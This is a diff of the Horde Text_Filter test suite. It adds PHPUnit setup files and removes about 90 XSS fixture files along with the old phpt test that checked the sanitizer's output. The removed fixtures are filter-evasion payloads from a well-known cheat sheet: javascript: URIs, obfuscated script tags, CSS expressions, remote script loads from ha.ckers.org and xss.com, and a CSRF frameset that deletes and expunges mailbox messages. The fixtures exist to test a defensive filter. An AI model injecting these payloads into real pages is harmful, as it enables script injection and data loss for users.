<dir name="Filter">
<dir name="fixtures">
<file name="html2text.html" role="test" />
- <file name="style_xss01.html" role="test" />
<file name="text2html.txt" role="test" />
- <file name="xss01.html" role="test" />
- <file name="xss02.html" role="test" />
- <file name="xss03.html" role="test" />
- <file name="xss04.html" role="test" />
- <file name="xss05.html" role="test" />
- <file name="xss06.html" role="test" />
- <file name="xss07.html" role="test" />
- <file name="xss08.html" role="test" />
- <file name="xss09.html" role="test" />
- <file name="xss10.html" role="test" />
- <file name="xss11.html" role="test" />
- <file name="xss12.html" role="test" />
- <file name="xss13.html" role="test" />
- <file name="xss14.html" role="test" />
- <file name="xss15.html" role="test" />
- <file name="xss16.html" role="test" />
- <file name="xss17.html" role="test" />
- <file name="xss18.html" role="test" />
- <file name="xss19.html" role="test" />
- <file name="xss20.html" role="test" />
- <file name="xss21.html" role="test" />
- <file name="xss22.html" role="test" />
- <file name="xss23.html" role="test" />
- <file name="xss24.html" role="test" />
- <file name="xss25.html" role="test" />
- <file name="xss26.html" role="test" />
- <file name="xss27.html" role="test" />
- <file name="xss28.html" role="test" />
- <file name="xss29.html" role="test" />
- <file name="xss30.html" role="test" />
- <file name="xss31.html" role="test" />
- <file name="xss32.html" role="test" />
- <file name="xss33.html" role="test" />
- <file name="xss34.html" role="test" />
- <file name="xss35.html" role="test" />
- <file name="xss36.html" role="test" />
- <file name="xss37.html" role="test" />
- <file name="xss38.html" role="test" />
- <file name="xss39.html" role="test" />
- <file name="xss40.html" role="test" />
- <file name="xss41.html" role="test" />
- <file name="xss42.html" role="test" />
- <file name="xss43.html" role="test" />
- <file name="xss44.html" role="test" />
- <file name="xss45.html" role="test" />
- <file name="xss46.html" role="test" />
- <file name="xss47.html" role="test" />
- <file name="xss48.html" role="test" />
- <file name="xss49.html" role="test" />
- <file name="xss50.html" role="test" />
- <file name="xss51.html" role="test" />
- <file name="xss52.html" role="test" />
- <file name="xss53.html" role="test" />
- <file name="xss54.html" role="test" />
- <file name="xss55.html" role="test" />
- <file name="xss56.html" role="test" />
- <file name="xss57.html" role="test" />
- <file name="xss58.html" role="test" />
- <file name="xss59.html" role="test" />
- <file name="xss60.html" role="test" />
- <file name="xss61.html" role="test" />
- <file name="xss62.html" role="test" />
- <file name="xss63.html" role="test" />
- <file name="xss64.html" role="test" />
- <file name="xss65.html" role="test" />
- <file name="xss66.html" role="test" />
- <file name="xss67.html" role="test" />
- <file name="xss68.html" role="test" />
- <file name="xss69.html" role="test" />
- <file name="xss70.html" role="test" />
- <file name="xss71.html" role="test" />
- <file name="xss72.html" role="test" />
- <file name="xss73.html" role="test" />
- <file name="xss74.html" role="test" />
- <file name="xss75.html" role="test" />
- <file name="xss76.html" role="test" />
- <file name="xss77.html" role="test" />
- <file name="xss78.html" role="test" />
- <file name="xss79.html" role="test" />
- <file name="xss80.html" role="test" />
- <file name="xss81.html" role="test" />
- <file name="xss82.html" role="test" />
- <file name="xss83.html" role="test" />
- <file name="xss84.html" role="test" />
- <file name="xss85.html" role="test" />
- <file name="xss97.html" role="test" />
- <file name="xss98.html" role="test" />
- <file name="xss99.html" role="test" />
- <file name="xss100.html" role="test" />
</dir> <!-- /test/Horde/Text/Filter/fixtures -->
+ <file name="AllTests.php" role="test" />
+ <file name="Autoload.php" role="test" />
+ <file name="XssTest.php" role="test" />
<file name="emails.phpt" role="test" />
<file name="environment.phpt" role="test" />
<file name="html2text.phpt" role="test" />
<file name="html2text2.phpt" role="test" />
+ <file name="phpunit.xml" role="test" />
<file name="space2html.phpt" role="test" />
<file name="text2html.phpt" role="test" />
- <file name="xss.phpt" role="test" />
</dir> <!-- /test/Horde/Text/Filter -->
</dir> <!-- /test/Horde/Text -->
</dir> <!-- /test/Horde -->
--- /dev/null
+<?php
+/**
+ * All tests for the Horde_Text_Filter:: package.
+ *
+ * PHP version 5
+ *
+ * @category Horde
+ * @package Text_Filter
+ * @author Michael Slusarz <slusarz@curecanti.org>
+ * @license http://www.fsf.org/copyleft/lgpl.html LGPL
+ * @link http://pear.horde.org/index.php?package=Text_Filter
+ */
+
+/**
+ * Define the main method
+ */
+if (!defined('PHPUnit_MAIN_METHOD')) {
+ define('PHPUnit_MAIN_METHOD', 'Horde_Text_Filter_AllTests::main');
+}
+
+/**
+ * Prepare the test setup.
+ */
+require_once 'Horde/Test/AllTests.php';
+
+/**
+ * @package Text_Filter
+ * @subpackage UnitTests
+ */
+class Horde_Text_Filter_AllTests extends Horde_Test_AllTests
+{
+}
+
+Horde_Text_Filter_AllTests::init('Horde_Text_Filter', __FILE__);
+
+if (PHPUnit_MAIN_METHOD == 'Horde_Text_Filter_AllTests::main') {
+ Horde_Text_Filter_AllTests::main();
+}
--- /dev/null
+<?php
+/**
+ * Setup autoloading for the tests.
+ *
+ * PHP version 5
+ *
+ * @category Horde
+ * @package Text_Filter
+ * @author Gunnar Wrobel <wrobel@pardus.de>
+ * @license http://www.fsf.org/copyleft/lgpl.html LGPL
+ * @link http://pear.horde.org/index.php?package=Text_Filter
+ */
+
+if (!spl_autoload_functions()) {
+ spl_autoload_register(
+ create_function(
+ '$class',
+ '$filename = str_replace(array(\'::\', \'_\'), \'/\', $class);'
+ . '$err_mask = E_ALL ^ E_WARNING;'
+ . '$oldErrorReporting = error_reporting($err_mask);'
+ . 'include "$filename.php";'
+ . 'error_reporting($oldErrorReporting);'
+ )
+ );
+}
+
+/** Catch strict standards */
+error_reporting(E_ALL | E_STRICT);
+++ /dev/null
-<BASE HREF="javascript:alert('XSS');//">
+++ /dev/null
-<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
+++ /dev/null
-<IMG SRC="javascript:alert('XSS');">
+++ /dev/null
-<IMG SRC=javascript:alert('XSS')>
+++ /dev/null
-<IMG SRC=JaVaScRiPt:alert('XSS')>
+++ /dev/null
-<IMG SRC=javascript:alert("XSS")>
+++ /dev/null
-<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
+++ /dev/null
-<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
+++ /dev/null
-<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+++ /dev/null
-<IMG SRC=javascript:alert('XSS')>
+++ /dev/null
-<IMG SRC=javascript:alert('XSS')>
+++ /dev/null
-<img src='blank.jpg'style='width:expression(alert("xssed"))'>
+++ /dev/null
-<IMG SRC=javascript:alert('XSS')>
+++ /dev/null
-<IMG SRC="jav ascript:alert('XSS');">
+++ /dev/null
-<IMG SRC="jav	ascript:alert('XSS');">
+++ /dev/null
-<IMG SRC="jav
ascript:alert('XSS');">
+++ /dev/null
-<IMG SRC="jav
ascript:alert('XSS');">
+++ /dev/null
-<IMG
-SRC
-=
-j
-a
-v
-a
-s
-c
-r
-i
-p
-t
-:
-a
-l
-e
-r
-t
-(
-'
-X
-S
-S
-'
-)
-"
->
+++ /dev/null
-<IMG SRC="  javascript:alert('XSS');">
+++ /dev/null
-<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+++ /dev/null
-<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
+++ /dev/null
-<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+++ /dev/null
-<<SCRIPT>alert("XSS");//<</SCRIPT>
+++ /dev/null
-<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
+++ /dev/null
-<SCRIPT SRC=//ha.ckers.org/.j>
+++ /dev/null
-<IMG SRC="javascript:alert('XSS')"
+++ /dev/null
-<iframe src=http://ha.ckers.org/scriptlet.html <
+++ /dev/null
-<SCRIPT>a=/XSS/
-alert(a.source)</SCRIPT>
+++ /dev/null
-</TITLE><SCRIPT>alert("XSS");</SCRIPT>
+++ /dev/null
-<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
+++ /dev/null
-<BODY BACKGROUND="javascript:alert('XSS')">
+++ /dev/null
-<BODY ONLOAD=alert('XSS')>
+++ /dev/null
-<IMG DYNSRC="javascript:alert('XSS')">
+++ /dev/null
-<IMG LOWSRC="javascript:alert('XSS')">
+++ /dev/null
-<BGSOUND SRC="javascript:alert('XSS');">
+++ /dev/null
-<BR SIZE="&{alert('XSS')}">
+++ /dev/null
-<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
+++ /dev/null
-<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
+++ /dev/null
-<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
+++ /dev/null
-<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
+++ /dev/null
-<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
+++ /dev/null
-<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
+++ /dev/null
-<XSS STYLE="behavior: url(xss.htc);">
+++ /dev/null
-<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
+++ /dev/null
-<IMG SRC='vbscript:msgbox("XSS")'>
+++ /dev/null
-<IMG SRC="mocha:[code]">
+++ /dev/null
-<IMG SRC="livescript:[code]">
+++ /dev/null
-<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
+++ /dev/null
-<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
+++ /dev/null
-<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
+++ /dev/null
-<IFRAME SRC=javascript:alert('XSS')></IFRAME>
+++ /dev/null
-<FRAMESET><FRAME SRC=javascript:alert('XSS')></FRAME></FRAMESET>
+++ /dev/null
-<TABLE BACKGROUND="javascript:alert('XSS')">
+++ /dev/null
-<TABLE><TD BACKGROUND="javascript:alert('XSS')">
+++ /dev/null
-<DIV STYLE="background-image: url(javascript:alert('XSS'))">
+++ /dev/null
-<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
+++ /dev/null
-<DIV STYLE="background-image: url(javascript:alert('XSS'))">
+++ /dev/null
-<DIV STYLE="width: expression(alert('XSS'));">
+++ /dev/null
-<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
+++ /dev/null
-<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
+++ /dev/null
-<XSS STYLE="xss:expression(alert('XSS'))">
+++ /dev/null
-exp/*<A STYLE='no\xss:noxss("*//*");
-xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
+++ /dev/null
-<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
+++ /dev/null
-<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
+++ /dev/null
-<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
+++ /dev/null
-<!--[if gte IE 4]>
-<SCRIPT>alert('XSS');</SCRIPT>
-<![endif]-->
+++ /dev/null
-<BASE HREF="javascript:alert('XSS');//">
+++ /dev/null
-<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
+++ /dev/null
-<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
+++ /dev/null
-<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
+++ /dev/null
-<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
+++ /dev/null
-<HTML xmlns:xss>
- <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
- <xss:xss>XSS</xss:xss>
-</HTML>
+++ /dev/null
-<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
-</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
+++ /dev/null
-<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
-<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
+++ /dev/null
-<XML SRC="xsstest.xml" ID=I></XML>
-<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
+++ /dev/null
-<HTML><BODY>
-<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
-<?import namespace="t" implementation="#default#time2">
-<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
-</BODY></HTML>
+++ /dev/null
-<SCRIPT SRC="http://ha.ckers.org/xss.jpg"><SCRIPT>
+++ /dev/null
-<IMG SRC="javascript:alert('XSS')"
+++ /dev/null
-<SCRIPT a=">" SRC="http://xss.com/a.js"></SCRIPT>
+++ /dev/null
-<SCRIPT =">" SRC="http://xss.com/a.js"></SCRIPT>
+++ /dev/null
-<SCRIPT a=">" '' SRC="http://xss.com/a.js"></SCRIPT>
+++ /dev/null
-<SCRIPT "a='>'" SRC="http://xss.com/a.js"></SCRIPT>
+++ /dev/null
-<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+++ /dev/null
-<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+++ /dev/null
-<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/a.js"></SCRIPT>
+++ /dev/null
-<a href="data:text/html;base64,PGh0bWw+PGhlYWQ+PHRpdGxlPnRlc3Q8L3RpdGxlPjwvaGVhZD48Ym9keT48c2NyaXB0PmFsZXJ0KCd4c3M6ICcgKyBkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+PC9ib2R5PjwvaHRtbD4=" href="data:text/html;base64,PGh0bWw+PGhlYWQ+PHRpdGxlPnRlc3Q8L3RpdGxlPjwvaGVhZD48Ym9keT48c2NyaXB0PmFsZXJ0KCd4c3M6ICcgKyBkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+PC9ib2R5PjwvaHRtbD4=">Click me</a>
+++ /dev/null
-<a href="data:text/html;base64,PGh0bWw+PGhlYWQ+PHRpdGxlPnRlc3Q8L3RpdGxlPjwvaGVhZD48Ym9keT48c2NyaXB0PmFsZXJ0KCd4c3M6ICcgKyBkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+PC9ib2R5PjwvaHRtbD4=">Click me</a>
+++ /dev/null
-<body/onload=alert(/xss/)>
+++ /dev/null
-<frameset rows="15,15,15,15,15,15,15,15,15,*">
-<frame src="mailbox.php?page=1&actionID=delete_messages&targetMbox=&newMbox=0&flag=&indices%5B%5D=199&indices%5B%5D=200&indices%5B%5D=201&indices%5B%5D=202&indices%5B%5D=203&indices%5B%5D=204&indices%5B%5D=205&indices%5B%5D=206&indices%5B%5D=207&indices%5B%5D=208&indices%5B%5D=209&indices%5B%5D=210&indices%5B%5D=211&indices%5B%5D=212&indices%5B%5D=213&indices%5B%5D=214&indices%5B%5D=215&indices%5B%5D=216&indices%5B%5D=217&indices%5B%5D=218&indices%5B%5D=219&indices%5B%5D=220&indices%5B%5D=221&indices%5B%5D=222&indices%5B%5D=223&indices%5B%5D=224&indices%5B%5D=225&indices%5B%5D=226&indices%5B%5D=227&indices%5B%5D=228&indices%5B%5D=229&indices%5B%5D=230&indices%5B%5D=231&indices%5B%5D=232&indices%5B%5D=233&indices%5B%5D=234&indices%5B%5D=235&indices%5B%5D=236&indices%5B%5D=237&indices%5B%5D=238&indices%5B%5D=239&indices%5B%5D=240&indices%5B%5D=241&indices%5B%5D=242&indices%5B%5D=243&indices%5B%5D=244&indices%5B%5D=245&indices%5B%5D=246&indices%5B%5D=247&indices%5B%5D=248&indices%5B%5D=249&indices%5B%5D=250&indices%5B%5D=251&indices%5B%5D=252&indices%5B%5D=253&indices%5B%5D=254&indices%5B%5D=255&indices%5B%5D=256&indices%5B%5D=257&indices%5B%5D=258&indices%5B%5D=259&indices%5B%5D=260&indices%5B%5D=261&indices%5B%5D=262&indices%5B%5D=263&indices%5B%5D=264&indices%5B%5D=265&indices%5B%5D=266&indices%5B%5D=267&indices%5B%5D=268&indices%5B%5D=269&indices%5B%5D=270&indices%5B%5D=271&indices%5B%5D=272&indices%5B%5D=273&indices%5B%5D=274&indices%5B%5D=275&indices%5B%5D=276&indices%5B%5D=277&indices%5B%5D=278&indices%5B%5D=279&indices%5B%5D=280&indices%5B%5D=281&indices%5B%5D=282&indices%5B%5D=283&indices%5B%5D=284&indices%5B%5D=285&indices%5B%5D=286&indices%5B%5D=287&indices%5B%5D=288&indices%5B%5D=289&indices%5B%5D=290&indices%5B%5D=291&indices%5B%5D=292&indices%5B%5D=293&indices%5B%5D=294&indices%5B%5D=295&indices%5B%5D=296&indices%5B%5D=297&indices%5B%5D=298">
-<frame src="mailbox.php?page=1&actionID=delete_messages&targetMbox=&newMbox=0&flag=&indices%5B%5D=299&indices%5B%5D=300&indices%5B%5D=301&indices%5B%5D=302&indices%5B%5D=303&indices%5B%5D=304&indices%5B%5D=305&indices%5B%5D=306&indices%5B%5D=307&indices%5B%5D=308&indices%5B%5D=309&indices%5B%5D=310&indices%5B%5D=311&indices%5B%5D=312&indices%5B%5D=313&indices%5B%5D=314&indices%5B%5D=315&indices%5B%5D=316&indices%5B%5D=317&indices%5B%5D=318&indices%5B%5D=319&indices%5B%5D=320&indices%5B%5D=321&indices%5B%5D=322&indices%5B%5D=323&indices%5B%5D=324&indices%5B%5D=325&indices%5B%5D=326&indices%5B%5D=327&indices%5B%5D=328&indices%5B%5D=329&indices%5B%5D=330&indices%5B%5D=331&indices%5B%5D=332&indices%5B%5D=333&indices%5B%5D=334&indices%5B%5D=335&indices%5B%5D=336&indices%5B%5D=337&indices%5B%5D=338&indices%5B%5D=339&indices%5B%5D=340&indices%5B%5D=341&indices%5B%5D=342&indices%5B%5D=343&indices%5B%5D=344&indices%5B%5D=345&indices%5B%5D=346&indices%5B%5D=347&indices%5B%5D=348&indices%5B%5D=349&indices%5B%5D=350&indices%5B%5D=351&indices%5B%5D=352&indices%5B%5D=353&indices%5B%5D=354&indices%5B%5D=355&indices%5B%5D=356&indices%5B%5D=357&indices%5B%5D=358&indices%5B%5D=359&indices%5B%5D=360&indices%5B%5D=361&indices%5B%5D=362&indices%5B%5D=363&indices%5B%5D=364&indices%5B%5D=365&indices%5B%5D=366&indices%5B%5D=367&indices%5B%5D=368&indices%5B%5D=369&indices%5B%5D=370&indices%5B%5D=371&indices%5B%5D=372&indices%5B%5D=373&indices%5B%5D=374&indices%5B%5D=375&indices%5B%5D=376&indices%5B%5D=377&indices%5B%5D=378&indices%5B%5D=379&indices%5B%5D=380&indices%5B%5D=381&indices%5B%5D=382&indices%5B%5D=383&indices%5B%5D=384&indices%5B%5D=385&indices%5B%5D=386&indices%5B%5D=387&indices%5B%5D=388&indices%5B%5D=389&indices%5B%5D=390&indices%5B%5D=391&indices%5B%5D=392&indices%5B%5D=393&indices%5B%5D=394&indices%5B%5D=395&indices%5B%5D=396&indices%5B%5D=397&indices%5B%5D=398">
-<frame src="mailbox.php?page=1&actionID=delete_messages&targetMbox=&newMbox=0&flag=&indices%5B%5D=399&indices%5B%5D=400&indices%5B%5D=401&indices%5B%5D=402&indices%5B%5D=403&indices%5B%5D=404&indices%5B%5D=405&indices%5B%5D=406&indices%5B%5D=407&indices%5B%5D=408&indices%5B%5D=409&indices%5B%5D=410&indices%5B%5D=411&indices%5B%5D=412&indices%5B%5D=413&indices%5B%5D=414&indices%5B%5D=415&indices%5B%5D=416&indices%5B%5D=417&indices%5B%5D=418&indices%5B%5D=419&indices%5B%5D=420&indices%5B%5D=421&indices%5B%5D=422&indices%5B%5D=423&indices%5B%5D=424&indices%5B%5D=425&indices%5B%5D=426&indices%5B%5D=427&indices%5B%5D=428&indices%5B%5D=429&indices%5B%5D=430&indices%5B%5D=431&indices%5B%5D=432&indices%5B%5D=433&indices%5B%5D=434&indices%5B%5D=435&indices%5B%5D=436&indices%5B%5D=437&indices%5B%5D=438&indices%5B%5D=439&indices%5B%5D=440&indices%5B%5D=441&indices%5B%5D=442&indices%5B%5D=443&indices%5B%5D=444&indices%5B%5D=445&indices%5B%5D=446&indices%5B%5D=447&indices%5B%5D=448&indices%5B%5D=449&indices%5B%5D=450&indices%5B%5D=451&indices%5B%5D=452&indices%5B%5D=453&indices%5B%5D=454&indices%5B%5D=455&indices%5B%5D=456&indices%5B%5D=457&indices%5B%5D=458&indices%5B%5D=459&indices%5B%5D=460&indices%5B%5D=461&indices%5B%5D=462&indices%5B%5D=463&indices%5B%5D=464&indices%5B%5D=465&indices%5B%5D=466&indices%5B%5D=467&indices%5B%5D=468&indices%5B%5D=469&indices%5B%5D=470&indices%5B%5D=471&indices%5B%5D=472&indices%5B%5D=473&indices%5B%5D=474&indices%5B%5D=475&indices%5B%5D=476&indices%5B%5D=477&indices%5B%5D=478&indices%5B%5D=479&indices%5B%5D=480&indices%5B%5D=481&indices%5B%5D=482&indices%5B%5D=483&indices%5B%5D=484&indices%5B%5D=485&indices%5B%5D=486&indices%5B%5D=487&indices%5B%5D=488&indices%5B%5D=489&indices%5B%5D=490&indices%5B%5D=491&indices%5B%5D=492&indices%5B%5D=493&indices%5B%5D=494&indices%5B%5D=495&indices%5B%5D=496&indices%5B%5D=497&indices%5B%5D=498">
-<frame src="mailbox.php?page=1&actionID=delete_messages&targetMbox=&newMbox=0&flag=&indices%5B%5D=499&indices%5B%5D=500&indices%5B%5D=501&indices%5B%5D=502&indices%5B%5D=503&indices%5B%5D=504&indices%5B%5D=505&indices%5B%5D=506&indices%5B%5D=507&indices%5B%5D=508&indices%5B%5D=509&indices%5B%5D=510&indices%5B%5D=511&indices%5B%5D=512&indices%5B%5D=513&indices%5B%5D=514&indices%5B%5D=515&indices%5B%5D=516&indices%5B%5D=517&indices%5B%5D=518&indices%5B%5D=519&indices%5B%5D=520&indices%5B%5D=521&indices%5B%5D=522&indices%5B%5D=523&indices%5B%5D=524&indices%5B%5D=525&indices%5B%5D=526&indices%5B%5D=527&indices%5B%5D=528&indices%5B%5D=529&indices%5B%5D=530&indices%5B%5D=531&indices%5B%5D=532&indices%5B%5D=533&indices%5B%5D=534&indices%5B%5D=535&indices%5B%5D=536&indices%5B%5D=537&indices%5B%5D=538&indices%5B%5D=539&indices%5B%5D=540&indices%5B%5D=541&indices%5B%5D=542&indices%5B%5D=543&indices%5B%5D=544&indices%5B%5D=545&indices%5B%5D=546&indices%5B%5D=547&indices%5B%5D=548&indices%5B%5D=549&indices%5B%5D=550&indices%5B%5D=551&indices%5B%5D=552&indices%5B%5D=553&indices%5B%5D=554&indices%5B%5D=555&indices%5B%5D=556&indices%5B%5D=557&indices%5B%5D=558&indices%5B%5D=559&indices%5B%5D=560&indices%5B%5D=561&indices%5B%5D=562&indices%5B%5D=563&indices%5B%5D=564&indices%5B%5D=565&indices%5B%5D=566&indices%5B%5D=567&indices%5B%5D=568&indices%5B%5D=569&indices%5B%5D=570&indices%5B%5D=571&indices%5B%5D=572&indices%5B%5D=573&indices%5B%5D=574&indices%5B%5D=575&indices%5B%5D=576&indices%5B%5D=577&indices%5B%5D=578&indices%5B%5D=579&indices%5B%5D=580&indices%5B%5D=581&indices%5B%5D=582&indices%5B%5D=583&indices%5B%5D=584&indices%5B%5D=585&indices%5B%5D=586&indices%5B%5D=587&indices%5B%5D=588&indices%5B%5D=589&indices%5B%5D=590&indices%5B%5D=591&indices%5B%5D=592&indices%5B%5D=593&indices%5B%5D=594&indices%5B%5D=595&indices%5B%5D=596&indices%5B%5D=597&indices%5B%5D=598">
-<frame src="mailbox.php?page=1&actionID=delete_messages&targetMbox=&newMbox=0&flag=&indices%5B%5D=599&indices%5B%5D=600&indices%5B%5D=601&indices%5B%5D=602&indices%5B%5D=603&indices%5B%5D=604&indices%5B%5D=605&indices%5B%5D=606&indices%5B%5D=607&indices%5B%5D=608&indices%5B%5D=609&indices%5B%5D=610&indices%5B%5D=611&indices%5B%5D=612&indices%5B%5D=613&indices%5B%5D=614&indices%5B%5D=615&indices%5B%5D=616&indices%5B%5D=617&indices%5B%5D=618&indices%5B%5D=619&indices%5B%5D=620&indices%5B%5D=621&indices%5B%5D=622&indices%5B%5D=623&indices%5B%5D=624&indices%5B%5D=625&indices%5B%5D=626&indices%5B%5D=627&indices%5B%5D=628&indices%5B%5D=629&indices%5B%5D=630&indices%5B%5D=631&indices%5B%5D=632&indices%5B%5D=633&indices%5B%5D=634&indices%5B%5D=635&indices%5B%5D=636&indices%5B%5D=637&indices%5B%5D=638&indices%5B%5D=639&indices%5B%5D=640&indices%5B%5D=641&indices%5B%5D=642&indices%5B%5D=643&indices%5B%5D=644&indices%5B%5D=645&indices%5B%5D=646&indices%5B%5D=647&indices%5B%5D=648&indices%5B%5D=649&indices%5B%5D=650&indices%5B%5D=651&indices%5B%5D=652&indices%5B%5D=653&indices%5B%5D=654&indices%5B%5D=655&indices%5B%5D=656&indices%5B%5D=657&indices%5B%5D=658&indices%5B%5D=659&indices%5B%5D=660&indices%5B%5D=661&indices%5B%5D=662&indices%5B%5D=663&indices%5B%5D=664&indices%5B%5D=665&indices%5B%5D=666&indices%5B%5D=667&indices%5B%5D=668&indices%5B%5D=669&indices%5B%5D=670&indices%5B%5D=671&indices%5B%5D=672&indices%5B%5D=673&indices%5B%5D=674&indices%5B%5D=675&indices%5B%5D=676&indices%5B%5D=677&indices%5B%5D=678&indices%5B%5D=679&indices%5B%5D=680&indices%5B%5D=681&indices%5B%5D=682&indices%5B%5D=683&indices%5B%5D=684&indices%5B%5D=685&indices%5B%5D=686&indices%5B%5D=687&indices%5B%5D=688&indices%5B%5D=689&indices%5B%5D=690&indices%5B%5D=691&indices%5B%5D=692&indices%5B%5D=693&indices%5B%5D=694&indices%5B%5D=695&indices%5B%5D=696&indices%5B%5D=697&indices%5B%5D=698">
-<frame src="mailbox.php?page=1&actionID=expunge_mailbox">
-<frame src="mailbox.php?page=1&actionID=expunge_mailbox">
-<frame src="mailbox.php?page=1&actionID=expunge_mailbox">
-<frame src="mailbox.php?page=1&actionID=expunge_mailbox">
-<frame src="http://secunia.com/">
-</frameset>
+++ /dev/null
-<img src=""> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"" />
--- /dev/null
+<?xml version="1.0" encoding="UTF-8"?>
+<phpunit>
+ <filter>
+ <whitelist>
+ <directory suffix=".php">../../../../lib</directory>
+ </whitelist>
+ </filter>
+</phpunit>
+++ /dev/null
---TEST--
-Horde_Text_Filter_Xss tests
---FILE--
-<?php
-
-/* Test cases from http://ha.ckers.org/xss.html */
-
-require dirname(__FILE__) . '/../../../../lib/Horde/Text/Filter.php';
-require dirname(__FILE__) . '/../../../../lib/Horde/Text/Filter/Base.php';
-require dirname(__FILE__) . '/../../../../lib/Horde/Text/Filter/Xss.php';
-require dirname(__FILE__) . '/../../../../../Util/lib/Horde/String.php';
-require dirname(__FILE__) . '/../../../../../Util/lib/Horde/Util.php';
-
-foreach (glob(dirname(__FILE__) . '/fixtures/xss*.html') as $file) {
- echo basename($file) . "\n" .
- Horde_Text_Filter::filter(file_get_contents($file), 'xss') .
- "\n";
-}
-
-foreach (glob(dirname(__FILE__) . '/fixtures/style_xss*.html') as $file) {
- echo basename($file) . "\n" .
- Horde_Text_Filter::filter(file_get_contents($file), 'xss', array(
- 'strip_styles' => false
- )) .
- "\n";
-}
-
-?>
---EXPECT--
-xss01.html
-
-xss02.html
-<img/>
-xss03.html
-<img/>
-xss04.html
-<img/>
-xss05.html
-<img/>
-xss06.html
-<img says=""/>
-xss07.html
-<img/>">
-
-xss08.html
-<img/>
-xss09.html
-<img/>
-xss10.html
-<img src="                       "/>
-xss100.html
-<img src="blank.jpg"/>
-xss11.html
-<img/>
-xss12.html
-<img/>
-xss13.html
-<img/>
-xss14.html
-<img/>
-xss15.html
-<img/>
-xss16.html
-<img src="j" a="" v="" s="" c="" r="" i="" p="" t="" :="" l="" e="" x=""/>
-xss17.html
-<img/>
-xss18.html
-
-xss19.html
-<img src=" "/>
-xss20.html
-
-xss21.html
-
-xss22.html
-
-xss23.html
-<p>alert("XSS");//</p>
-xss24.html
-
-xss25.html
-
-xss26.html
-<img/>
-xss27.html
-
-xss28.html
-
-xss29.html
-
-xss30.html
-<input type="IMAGE"/>
-xss31.html
-
-xss32.html
-
-xss33.html
-<img/>
-xss34.html
-<img/>
-xss35.html
-<bgsound/>
-xss36.html
-<br/>
-xss37.html
-
-xss38.html
-
-xss39.html
-
-xss40.html
-
-xss41.html
-
-xss42.html
-
-xss43.html
-<xss/>
-xss44.html
-<ul><li>XSS
-</li></ul>
-xss45.html
-<img/>
-xss46.html
-<img/>
-xss47.html
-<img/>
-xss48.html
-
-xss49.html
-
-xss50.html
-
-xss51.html
-
-xss52.html
-
-xss53.html
-<table/>
-xss54.html
-<table><td/></table>
-xss55.html
-<div/>
-xss56.html
-<div/>
-xss57.html
-<div/>
-xss58.html
-<div/>
-xss59.html
-
-xss60.html
-<img/>
